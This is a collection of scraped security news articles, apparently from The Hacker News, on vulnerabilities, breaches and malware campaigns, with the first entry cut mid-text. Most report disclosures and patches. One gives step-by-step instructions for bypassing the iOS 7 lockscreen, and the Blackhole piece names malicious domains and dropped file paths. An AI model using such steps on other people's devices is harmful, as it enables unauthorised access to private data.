""We have detected some PDF samples in the wild that are exploiting this issue. Our investigation shows that the samples were made and delivered by an 'email tracking service' provider. We don't know whether the issue has been abused for illegal or APT attacks,"" wrote McAfee's Haifei Li.
McAfee declined to reveal the details of the vulnerability as Adobe is yet to release a patch for it. The vendor said that it has already detected a number of groups and people exploiting it, potentially for malicious purposes.
""Malicious senders could exploit this vulnerability to collect sensitive information such as IP address, Internet service provider or even the victim's computing routine. In addition, our analysis suggests that more information could be collected by calling various PDF JavaScript APIs.""
McAfee suggests that Adobe Reader users disable JavaScript until a patch is released.
iPhone's iOS 7 Lockscreen hack allows to bypass Security,https://thehackernews.com/2013/09/iphones-ios-7-lockscreen-hack-allows-to.html,"Like most iOS lock screen vulnerabilities, the passcode lock screen on iOS 7 also suffers from a bug that allows anyone with direct access to the iPhone or iPad.
Although Apple claims to have fixed 80 security vulnerabilities with iOS 7, including the ability to bypass the lock screen in iOS 6.1.3, the same person who found the previous vulnerability has found yet another in iOS 7.
Discovered by 'Jose Rodriquez', an iPhone user reported a security flaw in iOS that lets anyone bypass the lockscreen passcode and access sensitive information stored in photos, Twitter, email and more.
The flaw resides on users who lock their devices with a traditional PIN code or password. The security flaw is demonstrated in the video below and it works as follows:
Swipe up from the bottom of the Lock screen to open Control Center and Launch the Clock app.
Open the Alarm Clock section of the Clock app and Hold down the power button.
Quickly tap Cancel the immediately double-click the Home button and Hold down for a bit longer on the second click.
From here you can access the camera and stored photos. You can share these photos on Facebook, Twitter, Flickr or via email.
The exploit has been tested successfully on iOS 7 when running on the iPhone 4S, 5, 5C, and 5S, and the most recent iPad model.
Until an official fix is available from Apple, iOS 7 users can avoid this security hole by disabling the control center of the lock screen in their device settings.
Update (5:02 PM Thursday, September 26, 2013 GMT) : Apple has just released iOS 7.0.2, a new update delivering several changes including a fix for a lock screen passcode vulnerability.
Hackers Breached Colonial Pipeline Using Compromised VPN Password,https://thehackernews.com/2021/06/hackers-breached-colonial-pipeline.html,"The ransomware cartel that masterminded the Colonial Pipeline attack early last month crippled the pipeline operator's network using a compromised virtual private network (VPN) account password, the latest investigation into the incident has revealed.
The development, which was reported by Bloomberg on Friday, involved gaining an initial foothold into the networks as early as April 29 through the VPN account, which allowed employees to access the company's networks remotely.
The VPN login — which didn't have multi-factor protections on — was unused but active at the time of the attack, the report said, adding the password has since been discovered inside a batch of leaked passwords on the dark web, suggesting that an employee of the company may have reused the same password on another account that was previously breached.
It's, however, unclear how the password was obtained, Charles Carmakal, senior vice president at the cybersecurity firm Mandiant, was quoted as saying to the publication. The FireEye-owned subsidiary is currently assisting Colonial Pipeline with the incident response efforts following a ransomware attack on May 7 that led to the company halting its operations for nearly a week.
DarkSide, the cybercrime syndicate behind the attack, has since disbanded, but not before stealing nearly 100 gigabytes of data from Colonial Pipeline in the act of double extortion, forcing the company to pay a $4.4 million ransom shortly after the hack and avoid disclosure of sensitive information. The gang is estimated to have made away with nearly $90 million during the nine months of its operations.
The Colonial Pipeline incident has also prompted the U.S. Transportation Security Administration to issue a security directive on May 28 requiring pipeline operators to report cyberattacks to the Cybersecurity and Infrastructure Security Agency (CISA) within 12 hours, in addition to mandating facilities to submit a vulnerability assessment identifying any gaps in their existing practices within 30 days.
The development comes amid an explosion of ransomware attacks in recent months, including that of Brazilian meat processing company JBS last week by Russia-linked REvil group, underscoring a threat to critical infrastructure and introducing a new point of failure that has had a severe impact on consumer supply chains and day-to-day operations, leading to fuel shortages and delays in emergency health procedures.
As the ransom demands have ballooned drastically, inflating from thousands to millions of dollars, so have the attacks on high-profile victims, with companies in energy, education, healthcare, and food sectors increasingly becoming prime targets, in turn fueling a vicious cycle that enables cybercriminals to seek the largest payouts possible.
The profitable business model of double extortion — i.e., combining data exfiltration and ransomware threats — have also resulted in attackers expanding on the technique to what's called triple extortion, wherein payments are demanded from customers, partners, and other third-parties related to the initial breach to demand even more money for their crimes.
Worryingly, this trend of paying off criminal actors has also set off mounting concerns that it could establish a dangerous precedent, further emboldening attackers to single out critical infrastructure and put them at risk.
REvil (aka Sodinokibi), for its part, has begun incorporating a new tactic into its ransomware-as-a-service (RaaS) playbook that includes staging distributed denial-of-service (DDoS) attacks and making voice calls to the victim's business partners and the media, ""aimed at applying further pressure on the victim's company to meet ransom demands within the designated time frame,"" researchers from Check Point disclosed last month.
""By combining file encryption, data theft, and DDoS attacks, cybercriminals have essentially hit a ransomware trifecta designed to increase the possibility of payment,"" network security firm NetScout said.
The disruptive power of the ransomware pandemic has also set in motion a series of actions, what with the U.S. Federal Bureau of Investigation (FBI) making the longstanding problem a ""top priority."" The Justice Department said it's elevating investigations of ransomware attacks to a similar priority as terrorism, according to a report from Reuters last week.
Stating that the FBI is looking at ways to disrupt the criminal ecosystem that supports the ransomware industry, Director Christopher Wray told the Wall Street Journal that the agency is investigating nearly 100 different types of ransomware, most of them traced backed to Russia, while comparing the national security threat to the challenge posed by the September 11, 2001 terrorist attacks.
Update: In a Senate committee hearing on June 8, Colonial Pipeline CEO Joseph Blount said that the ransomware attack that disrupted gasoline supply in the U.S. started with the attackers exploiting a legacy VPN profile that was not intended to be in use. ""We are still trying to determine how the attackers gained the needed credentials to exploit it,"" Blunt said in his testimony.
Besides shutting down the legacy VPN profile, Blunt said extra layers of protection have been implemented across the enterprise to bolster its cyber defenses. ""But criminal gangs and nation states are always evolving, sharpening their tactics, and working to find new ways to infiltrate the systems of American companies and the American government. These attacks will continue to happen, and critical infrastructure will continue to be a target,"" he added.
Live Cybersecurity Webinar — Deconstructing Cobalt Strike,https://thehackernews.com/2021/06/live-cybersecurity-webinar.html,"Organizations' cybersecurity capabilities have improved over the past decade, mostly out of necessity. As their defenses get better, so do the methods, tactics, and techniques malicious actors devise to penetrate their environments.
Instead of the standard virus or trojan, attackers today will deploy a variety of tools and methods to infiltrate an organization's environment and attack it from the inside.
In an interesting twist of fate, one of the tools organizations have used to audit and improve their defenses has also become a popular tool attackers use to infiltrate. Cobalt Strike is an Adversary Simulation and Red Team Operations tool that allows organizations to simulate advanced attacks and test their security stacks in a close-to-real-world simulation.
A new research webinar from XDR provider Cynet (register here) offers a better look at Cobalt Strike. The webinar, led by Cyber Operations Analyst for the Cynet MDR Team Yuval Fischer, will take a deep dive into the threat.
As a simulation, it is impressive in its capabilities, and it's prized for being highly customizable. All these traits have also made it an effective attack tool for actual malicious actors. Cobalt Strike is a C2 server that offers highly sophisticated and easy-to-use features, and the past year has seen a huge jump in the number of recorded Cobalt Strike attacks in the wild. In fact, a study by Recorded Future's Insikt Group found that Cobalt Strike was the most commonly deployed C2 server in malicious attacks.
One of the biggest reasons Cobalt Strike has become so widespread is its various capabilities, which include:
Reconnaissance on client-side software usage, as well as version vulnerabilities
A variety of attack packages that include social engineering, trojans, and masquerading tools
Collaboration tools that let group host share data with a group of attackers
Post exploitation tools to deploy scripts, log keystrokes and execute other payloads
Covert communication tools that let teams modify network indicators on the go
Browser pivoting to circumvent
Additionally, Cobalt Strike uses Beacon, a powerful delivery mechanism that can be transmitted over various protocols, and hide by modifying its network signature, emulating other types of malware, and even masquerading as legitimate traffic.
Even so, Cobalt Strike is not undetectable. However, it requires a variety of techniques to detect it properly. This includes things like examining default TLS certificates, searching for open ports, And performing HTTP requests to find non-existent pages. Even then, most organizations require advanced tools actually to defend against Cobalt Strike..
The new research webinar dives deeper into Cobalt Strike. It does so by exploring a few areas:
The basics of Cobalt Strike as an attack tool. This includes breaking down how it works, what makes it so effective, and how malicious actors have modified, customized, and upgraded it to become more dangerous.
Instances in the wild. More than any theoretical research, live case studies provide the greatest insights into how Cobalt Strike operates and succeeds in penetrating organizations' defenses.
A deeper dive into Cobalt Strike's capabilities and deployment tools. The webinar will also dive deeper into Cobalt Strike's different functionalities, how they're deployed, and what they actually do.
How organizations can defend against Cobalt Strike. Finally, the webinar will touch on the ways organizations can detect and defend against Cobalt Strike, and how they can mitigate the impact of a successful initial infiltration.
You can register here for the webinar.
New Bluetooth Vulnerability Lets Attackers Spy On Encrypted Connections,https://thehackernews.com/2019/08/bluetooth-knob-vulnerability.html,"Over a billion Bluetooth-enabled devices, including smartphones, laptops, smart IoT devices, and industrial devices, have been found vulnerable to a high severity vulnerability that could allow attackers to spy on data transmitted between the two devices.
The vulnerability, assigned as CVE-2019-9506, resides in the way 'encryption key negotiation protocol' lets two Bluetooth BR/EDR devices choose an entropy value for encryption keys while pairing to secure their connection.
Referred to as the Key Negotiation of Bluetooth (KNOB) attack, the vulnerability could allow remote attackers in close proximity to targeted devices to intercept, monitor, or manipulate encrypted Bluetooth traffic between two paired devices.
The Bluetooth BR/EDR (Basic Rate/Enhanced Data Rate, also known as ""Bluetooth Classic"") is a wireless technology standard that has typically been designed for relatively short-range, continuous wireless connection such as streaming audio to headsets or portable speakers.
From the security point of view, the core specification of Bluetooth BR/EDR protocol supports encryption keys with entropy between 1 and 16 bytes/octets, where the higher value means more security.
However, researchers find that the entropy negotiation, which devices perform over the Link Manager Protocol (LMP), is neither encrypted nor authenticated, and can be hijacked or manipulated over-the-air.
How Does Bluetooth BR/EDR Key Negotiation Vulnerability Work?
The newly discovered Bluetooth vulnerability could allow a remote attacker to trick two targeted devices into agreeing on an encryption key with only 1 byte (8 bits) of entropy, eventually making it easy to brute-force the negotiated encryption keys.
""For example, assume that there are two controllers attempting to establish a connection: Alice and Bob. After authenticating the link key, Alice proposes that she and Bob use 16 bytes of entropy. This number, N, could be between 1 and 16 bytes. Bob can either accept this, reject this and abort the negotiation, or propose a smaller value,"" explains an advisory published by the CERT Coordination Center.
""Bob may wish to propose a smaller N value because he (the controller) does not support the larger amount of bytes proposed by Alice. After proposing a smaller amount, Alice can accept it and request to activate link-layer encryption with Bob, which Bob can accept.""
However, by exploiting the reported vulnerability ""an attacker, Charlie, could force Alice and Bob to use a smaller N by intercepting Alice's proposal request to Bob and changing N.""
Once decrypted, the attacker can passively capture encrypted messages being transmitted over the Bluetooth traffic, decrypt the ciphertext and inject valid valid ciphertext, all in real-time and stealthy.
Besides this, it is also important to note that, for an attack to be successful:
both Bluetooth devices must be establishing a BR/EDR connection,
both Bluetooth devices must be vulnerable to this flaw,
the attacker should be able to block direct transmissions between devices while pairing, and
the attack must be performed during negotiation or renegotiation of a paired device connection; existing sessions cannot be attacked.
Moreover, the official advisory released by Bluetooth.com also says, ""Since not all Bluetooth specifications mandate a minimum encryption key length, it is possible that some vendors may have developed Bluetooth products where the length of the encryption key used on a BR/EDR connection could be set by an attacking device down to a single octet.""
Affected Vendors/Software/OS and Patch Updates
This vulnerability was discovered by a team of researchers including Daniele Antonioli from SUTD, Dr. Nils Ole Tippenhauer from CISPA and Prof. Kasper Rasmussen from the University of Oxford.
""We evaluate the KNOB attack on more than 14 Bluetooth chips from different vendors such as Intel, Broadcom, Apple, and Qualcomm. All the chips accept 1 byte of entropy except the Apple W1 chip that accepts (at least) 7 bytes of entropy,"" the researchers said in a detailed paper [PDF] released yesterday.
To mitigate KNOB attack, the maintainers of the Bluetooth specifications have strongly recommended device manufacturers and software vendors to enforce a minimum encryption key length of 7 octets for BR/EDR connections.
To patch this vulnerability, various affected vendors have already started releasing security updates for their operating systems, firmware, and software, including:
Microsoft for Windows
Cisco for IP Phones and Webex
Google for Android
Apple for macOS, iOS, and watchOS
WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework,https://thehackernews.com/2017/04/wikileaks-cia-malware.html,"As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonged to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build ""customised malware"" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.
All the leaked documents are basically a user manual that the agency flagged as ""secret"" and that are supposed to be only accessed by the members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, Grasshopper framework allows the agency members to easily create custom malware, depending upon the technical details, such as what operating system and antivirus the targets are using.
The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.
""A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,"" the documentation reads. ""Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.""
The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even from the anti-virus products from the world's leading vendors including Kaspersky Lab, Symantec, and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also ""to maintain persistence over infected Microsoft Windows computers.""
""Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption),"" Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such malware is ""Carberp,"" which is a malware rootkit developed by Russian hackers.
""The persistence method and parts of the installer were taken and modified to fit our needs,"" the leaked document noted. ""A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.""
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the ""Year Zero"" batch which uncovered CIA hacking exploits for popular hardware and software, the ""Dark Matter"" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called ""Marble.""
Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
CVE-2013-3906 : Zero Day Vulnerability in Microsoft Graphics Component,https://thehackernews.com/2013/11/cve-2013-3906-zero-day-vulnerability-Microsoft-Graphics-Component.html,"Microsoft has issued a temporary fix for a 0day vulnerability that can be exploited to install malware via infected Word documents.
A Zero-day Remote code execution flaw, which has been dubbed CVE-2013-3906, exploits a vulnerability in a Microsoft graphics component, to target Microsoft Office users running Windows Vista and Windows Server 2008.
""The vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images,"" it said in the post. Vulnerability was reported to Microsoft by McAfee Labs senior security researcher Haifei Li.
A successful infection can give an attacker complete control over a system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Currently the company is only aware of targeted attacks mostly in the Middle East and South Asia, with attackers sending unsuspecting victims crafted Word documents with a tainted attachment.
""An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content.""
According to Microsoft, the exploit combines multiple techniques to bypass exploit mitigation techniques such as ASLR (DEP) and address space layout randomization (ASLR).
The affected products are:
Windows Vista x86, x64
Windows Server 2008 x86, x64, Itanium, Server Core
Microsoft Office 2003
Microsoft Office 2007
Microsoft Office 2010 x86, x64
Microsoft Office Compatibility Pack
Microsoft Lync 2010 x86, x64
Microsoft Lync 2010 Attendee
Microsoft Lync 2013 x86, x64
Microsoft Lync Basic 2013 x86, x64
Windows 7 and 8 and Office 2013 and Office 365 are not affected.
Microsoft released a temporary 'Fix it' workaround that could block the attack by blocking rendering of the vulnerable TIFF graphic format by way of a registry key.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Gdiplus\DisableTIFFCodec = 1
The Enhanced Mitigation Experience Toolkit (EMET) helps mitigate the exploitation of this vulnerability by adding additional protection layers that make the vulnerability harder to exploit.
HTML5 browser exploit can flood your Hard Drive with junk data,https://thehackernews.com/2013/03/html5-browser-exploit-can-flood-your.html,"Feross Aboukhadijeh, 22-year-old Web developer from Stanford has discovered HTML5 browser exploit can flood your Hard Drive with Cat and Dogs i.e junk data.
Many times a website needs to leave a little data i.e 5-10KB on your computer like a cookie, but HTML5 allow sites to store larger amounts of data (like 5-10 MB). In a proof-of-concept he was able to full up 1 GB of HDD space every 16 seconds.
He created FillDisk.com in order to demonstrate the exploit in HTML5. Once user will visit the website the Web Storage standard allows website to place large amounts of data on your drive. Please note that, It's not a hack and this exploit won't allow attackers to access your computer.
However, Web browsers have the ability to limit just how much space websites can dump onto your hard drive. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit. Whereas Chrome, Safari (iOS and desktop), and IE vulnerable to this.
You can find the source code here. Feross already logged the bug for Chrome and Safari, so the problem there should be fixed soon.
Airplanes Can Be Hacked Through Wireless In-flight Entertainment System,https://thehackernews.com/2014/08/airplanes-can-be-hacked-through_4.html,"Almost a year ago, at the 'Hack In The Box' security summit in Amsterdam, a security researcher at N.Runs and a commercial airline pilot, Hugo Teso presented a demonstration that it's possible to take control of aircraft flight systems and communications using an Android smartphone and some specialized attack code.
Quite similar to the previous one, a security researcher claims to have devised a method that can give cyber criminals access to the satellite communications equipment on passenger jets through their WiFi and in-flight entertainment systems.
Cyber security expert Ruben Santamarta, a consultant with cyber security firm IOActive, will unveil his research and all the technical details this week at a major Las Vegas hacker convention, Black Hat conference, showing How commercial airliner satellite communication systems can also be compromised by hackers, along with the evidence of satellite communications system vulnerabilities that questions the standards these systems are using.
Santamarta research paper titled ""SATCOM Terminals: Hacking by Air, Sea and Land"" explains that ships, aircraft and industrial facilities are all at risk of being compromised — perhaps with catastrophic results.
""We live in a world where data is constantly flowing. It is clear that those who control communications traffic have a distinct advantage. The ability to disrupt, inspect, modify or re-route traffic provides an invaluable opportunity to carry out attacks,"" Santamarta wrote in his paper.
Till now, it's just a claim, but if confirmed, could prompt a comprehensive restructure of aircraft security and other SATCOM terminals, and cast review on the way its electronic security have been managed in the past.
According to the researcher's abstract of the talk made public, he will explain how devices sold by the world's leading SATCOM vendors contain significant security flaws. IOActive also claimed to have determined that ""100 percent of the devices could be abused"" by an array of attack vectors.
""In certain cases no user interaction is required to exploit the vulnerability, just sending a simple SMS or specially crafted message from one ship to another ship can do it."" Santamarta wrote in the description to his talk. He told Reuters, ""These devices are wide open. The goal of this talk is to help change that situation.""
Many of SATCOM vendors systems have hardcoded log-in credentials — same credentials used in multiple systems — giving hackers potential to steal credentials from one system and use them to access other systems, as a result of it, hackers can disable the communications and can interfere with the plane's navigation.
The researcher discovered the vulnerabilities by ""reverse engineering"" the highly specialized software known as firmware, used to operate communications equipment made by Cobham Plc, Harris Corp, EchoStar Corp's Hughes Network Systems, Iridium Communications Inc and Japan Radio Co Ltd.
Meanwhile, he discovered a theory that a hacker could leverage a plane's onboard Wi-Fi signal or in-flight entertainment system to hack into its avionics equipment. This could allow them to disrupt or modify the plane's satellite communications, potentially interfering with the aircraft's navigation and safety systems.
However, it is really important to note that just because a security researcher can perform the hack, doesn't mean hackers are doing it or can easily perform it, too. Santamarta has also acknowledged that his hacks proving the theory have been carried out in controlled test, and he is not sure how practical the hack would be in the real world.
Furthermore, in the abstract of his talk, we are not provided any technical details or any specific details of the exploit, so we are required to wait until Santamarta's presentation later this week.
Still, a good news for those companies that make such equipments is that the researcher plans to reveal all the possible details of the exploit in his presentation to help them fix the issues in their vulnerable equipment.
"Over 750,000 Users Downloaded New Billing Fraud Apps From Google Play Store",https://thehackernews.com/2021/04/over-750000-users-download-new-billing.html,"Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud.
The apps in question primarily targeted users in Southwest Asia and the Arabian Peninsula, attracting a total of 700,000 downloads before they were discovered and removed from the platform.
The findings were reported independently by cybersecurity firms Trend Micro and McAfee.
""Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases,"" researchers from McAfee said in a Monday write-up.
The fraudulent apps belong to the so-called ""Joker"" (aka Bread) malware, which has been found to repeatedly sneak past Google Play defenses over the past four years, resulting in Google removing no fewer than 1,700 infected apps from the Play Store as of early 2020. McAfee, however, is tracking the threat under a separate moniker named ""Etinu.""
The malware is notorious for perpetrating billing fraud and its spyware capabilities, including stealing SMS messages, contact lists, and device information. The malware authors typically employ a technique called versioning, which refers to uploading a clean version of the app to the Play Store to build trust among users and then sneakily adding malicious code at a later stage via app updates, in a bid to slip through the app review process.
The additional code injected serves as the first-stage payload, which masquerades as seemingly innocuous .PNG files and establishes with a command-and-control (C2) server to retrieve a secret key that's used to decrypt the file to a loader. This interim payload then loads the encrypted second payload that's ultimately decrypted to install the malware.
McAfee's investigation of the C2 servers revealed users' personal information, including carrier, phone number, SMS message, IP address, country, network status, along with auto-renewing subscriptions.
The list of nine apps is below -
Keyboard Wallpaper (com.studio.keypaper2021)
PIP Photo Maker (com.pip.editor.camera)
2021 Wallpaper and Keyboard (org.my.favorites.up.keypaper)
Barber Prank Hair Dryer, Clipper and Scissors (com.super.color.hairdryer)
Picture Editor (com.ce1ab3.app.photo.editor)
PIP Camera (com.hit.camera.pip)
Keyboard Wallpaper (com.daynight.keyboard.wallpaper)
Pop Ringtones for Android (com.super.star.ringtones)
Cool Girl Wallpaper/SubscribeSDK (cool.girly.wallpaper)
Users who have downloaded the apps are urged to check for any unauthorized transactions while also taking steps to watch out for suspicious permissions requested by apps and carefully scrutinize apps before they are installed on the devices.
""Judging by how Joker operators repeatedly ensure the malware's persistence in Google Play even after being caught numerous times, most probably there are ways [the operators] are profiting from this scheme,"" Trend Micro researchers said.
Hackers Compromise T-Mobile Employee' Email Accounts and Steal User' Data,https://thehackernews.com/2020/03/hackers-compromise-t-mobile-employees.html,"If you are a T-Mobile customer, this news may concern you.
US-based telecom giant T-Mobile has suffered yet another data breach incident that recently exposed personal and accounts information of both its employees and customers to unknown hackers.
What happened? In a breach notification posted on its website, T-Mobile today said its cybersecurity team recently discovered a sophisticated cyberattack against the email accounts of some of its employees that resulted in unauthorized access to the sensitive information contained in it, including details for its customers and other employees.
Although the telecom company did not disclose how the breach happened, when it happened, and exactly how many employees and users were affected, it did confirm that the leaked information on its users doesn't contain financial information like credit card and Social Security numbers.
What type of information was accessed? The exposed data of an undisclosed number of affected users include their:
phone numbers,
account numbers,
rate plans and features, and
billing information.
What is T-Mobile now doing? The company took necessary steps to shut down the unauthorized access upon discovery and immediately notified law enforcement of the security breach incident.
T-Mobile also immediately launched a forensic investigation to determine the extent of the breach incident, a report of which is expected to be released soon..
""We regret that this incident occurred. We take the security of your information very seriously, and while we have a number of safeguards in place to protect customer information from unauthorized access, we are also always working to further enhance security so we can stay ahead of this type of activity,"" the company said.
The company is notifying affected customers of the breach incident.
What should you do now? Though T-Mobile said it does not have any evidence of the stolen information being used to commit fraud or otherwise misused, it still advises users to change PIN/passcode to access their accounts as a precaution.
Affected customers should also be suspicious of phishing emails, which are usually the next step of cybercriminals in an attempt to trick users into giving away their passwords and credit card information.
Although the T-Mobile data breach incident did not expose any financial information of affected customers, it is always a good idea to be vigilant and keep a close eye on your bank and payment card statements for any unusual activity and report to the bank if you find any.
The incident comes in less than six months after the telecom giant suffered a significant data breach that exposed the personal information of some of the customers using its prepaid services.
In August 2018, the company also disclosed a data breach that affected roughly two million customers.
Another Facebook Bug Could Have Exposed Your Private Information,https://thehackernews.com/2018/11/facebook-vulnerability-hack.html,"Another security vulnerability has been reported in Facebook that could have allowed attackers to obtain certain personal information about users and their friends, potentially putting the privacy of users of the world's most popular social network at risk.
Discovered by cybersecurity researchers from Imperva, the vulnerability resides in the way Facebook search feature displays results for entered queries.
According to Imperva researcher Ron Masas, the page that displays search results includes iFrame elements associated with each outcome, where the endpoint URLs of those iFrames did not have any protection mechanisms in place to protect against cross-site request forgery (CSRF) attacks.
It should be noted that the newly reported vulnerability has already been patched, and unlike previously disclosed flaw in Facebook that exposed personal information of 30 million users, it did not allow attackers to extract information from mass accounts at once.
How Does the Facebook Search Vulnerability Work?
To exploit this vulnerability, all an attacker needs to do is simply tricking users into visiting a malicious site on their web browser where they have already logged into their Facebook accounts.
The malicious site contains a javascript code that will get executed in the background as soon as the victim clicks anywhere on that page.
""For this attack to work we need to trick a Facebook user to open our malicious site and click anywhere on the site, (this can be any site we can run JavaScript on) allowing us to open a popup or a new tab to the Facebook search page, forcing the user to execute any search query we want,"" Masas explained in a blog post published today.
As demonstrated by Masas in the video shown below, the JavaScript code opens a new tab or window with a Facebook URL that runs certain predefined search queries and measures the result to extract targeted information.
Searching something on Facebook seems less lucrative, especially when the exploit code returns the result in just yes or no.
""The attack actually leaks the number of search results for any search query on the currently logged Facebook account. The most basic usage is to make boolean queries like 'photos of me from Iceland',"" Masas told The Hacker News.
But if used correctly, Facebook's search feature could be exploited to extract sensitive information related to your Facebook account, such as checking:
If you have a friend with a specific name or a keyword in his/her name
If you like a particular page or are a member of a specific group
If you have a friend who likes a particular page
If you have taken photos in a certain location or country
If you have ever posted a photo taken at certain places/countries
If you have ever posted an update on your timeline containing a specific text/keyword
If you have Islamic friends
And so on… any custom query you can come up with.
""This process can be repeated without the need for new popups or tabs to be open since the attacker can control the location property of the Facebook window,"" Masas added. ""This is especially dangerous for mobile users, since the open tab can easily get lost in the background, allowing the attacker to extract the results for multiple queries, while the user is watching a video or reading an article on the attacker's site.""
In short, the vulnerability exposed interests and activities of targeted users and their friends even if their privacy settings are set in a way that this information can only be visible to them or their friends.
Imperva responsibly reported the bug to Facebook through the company's vulnerability disclosure program in May 2018, and the social network giant resolved the issue days later by adding CSRF protections.
Almost three months ago, Masas also reported an impressive web browser vulnerability that exposed everything other web platforms, like Facebook and Google, knows about you. He also released a proof of concept exploit of the bug.
New Bluetooth Hack Affects Millions of Devices from Major Vendors,https://thehackernews.com/2018/07/bluetooth-hack-vulnerability.html,"Yet another bluetooth hacking technique has been uncovered.
A highly critical cryptographic vulnerability has been found affecting some Bluetooth implementations that could allow an unauthenticated, remote attacker in physical proximity of targeted devices to intercept, monitor or manipulate the traffic they exchange.
The Bluetooth hacking vulnerability, tracked as CVE-2018-5383, affects firmware or operating system software drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm, while the implication of the bug on Google, Android and Linux are still unknown.
The security vulnerability is related to two Bluetooth features—Bluetooth low energy (LE) implementations of Secure Connections Pairing in operating system software, and BR/EDR implementations of Secure Simple Pairing in device firmware.
How the Bluetooth Hack Works?
Researchers from the Israel Institute of Technology discovered that the Bluetooth specification recommends, but does not mandate devices supporting the two features to validate the public encryption key received over-the-air during secure pairing.
Since this specification is optional, some vendors' Bluetooth products supporting the two features do not sufficiently validate elliptic curve parameters used to generate public keys during the Diffie-Hellman key exchange.
In this case, an unauthenticated, remote attacker within the range of targeted devices during the pairing process can launch a man-in-the-middle attack to obtain the cryptographic key used by the device, allowing them to potentially snoop on supposedly encrypted device communication to steal data going over-the-air, and inject malware.
Here's what the Bluetooth Special Interest Group (SIG), the maintainers of the technology, says about the flaw:
""For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure.""
""The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgment to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful.""
On Monday, CERT/CC also released a security advisory, which includes additional technical details about the Bluetooth vulnerability and attack method.
According to the CERT/CC, Bluetooth makes use of a device pairing mechanism based on elliptic-curve Diffie-Hellman (ECDH) key exchange to allow encrypted communication between devices.
The ECDH key exchange involves a private and a public key, and the public keys are exchanged to produce a shared pairing key.
The devices must also agree on the elliptic curve parameters being used, but in some implementations, these parameters are not sufficiently validated, allowing remote attackers within wireless range ""to inject an invalid public key to determine the session key with high probability.""
Stop Bluetooth Hacking—Install Patches from Vendors
To fix the issue, the Bluetooth SIG has now updated the Bluetooth specification to require products to validate public keys received as part of public key-based security procedures.
Moreover, the organization has also added testing for this vulnerability within its Bluetooth Qualification Process.
The CERT/CC says patches are needed both in firmware or operating system software drivers, which should be obtained from vendors and developers of the affected products, and installed—if at all possible.
Also Read: BlueBorne Attack Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking
Apple, Broadcom, Intel, and Qualcomm Found Affected
So far, Apple, Broadcom, Intel, and Qualcomm have been found including affected Bluetooth chipsets in their devices, while Google, Android, and Linux have yet to confirm the existence of the vulnerability in their respective products. Microsoft products are not vulnerable.
Apple and Intel have already released patches for this security vulnerability. Apple fixed the bug with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.
Intel released both software and firmware updates to patch the Bluetooth bug on Monday, informing users that the high severity flaw impacts the company's Dual Band Wireless-AC, Tri-Band Wireless-AC, and Wireless-AC product families.
According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be affected by the reported issue, but the chip maker claims to have already made fixes available to its OEM customers, who are now responsible for providing them to the end-users.
Qualcomm has not released any statement regarding the vulnerability.
The Bluetooth SIG says that there is no evidence of the bug being exploited maliciously and that it is not aware of ""any devices implementing the attack having been developed, including by the researchers who identified the vulnerability.""
Blackhole Exploit Kit attack on WampServer & Wordpress sites,https://thehackernews.com/2011/11/blackhole-exploit-kit-attack-on.html,"Blackhole Exploit Kit attack on WampServer & Wordpress sites
Kimberly from Stopmalvertising found Blackhole Exploit Kit on Website of most popular Webserver software site WAMPSERVER. Almost at the bottom of the webpage they notice a Javascript requesting a file from jquery.googlecode.com. The URL is followed by a long string of parameters. The file returns a 404, it's just there to fool people.
Once the script decoded we obtain an iframe leading to vc-business.com/in.php .According to Analyse of Kimberly , If a vulnerable Java, Windows Media Player, Flash or Adobe Reader version is detected, the visitor will be redirected to and from there to 30domaaaam.in/main.php?page=c76874df55550a3f. According to Norton Safe Web, has been caught in distributing the ZeroAccess rootkit.
Second Recent Attack by Blackhole Exploit discovered in thousands of WordPress websites that use a popular non-updated TimThumb image tool. Avast senior researcher Jan Sirmer found attackers had exploited weak FTP server authentication credentials and a vulnerability in the TimThumb image resizer to upload malicious PHP files to the site. But this is not the only way for example they use stolen passwords to direct FTP changes.In your FTP, alongside other site files, a new file will appear that looks like this: ./wp-content/w3tc/min/a12ed303.925433.js or ./wp-includes/js/l10n.js
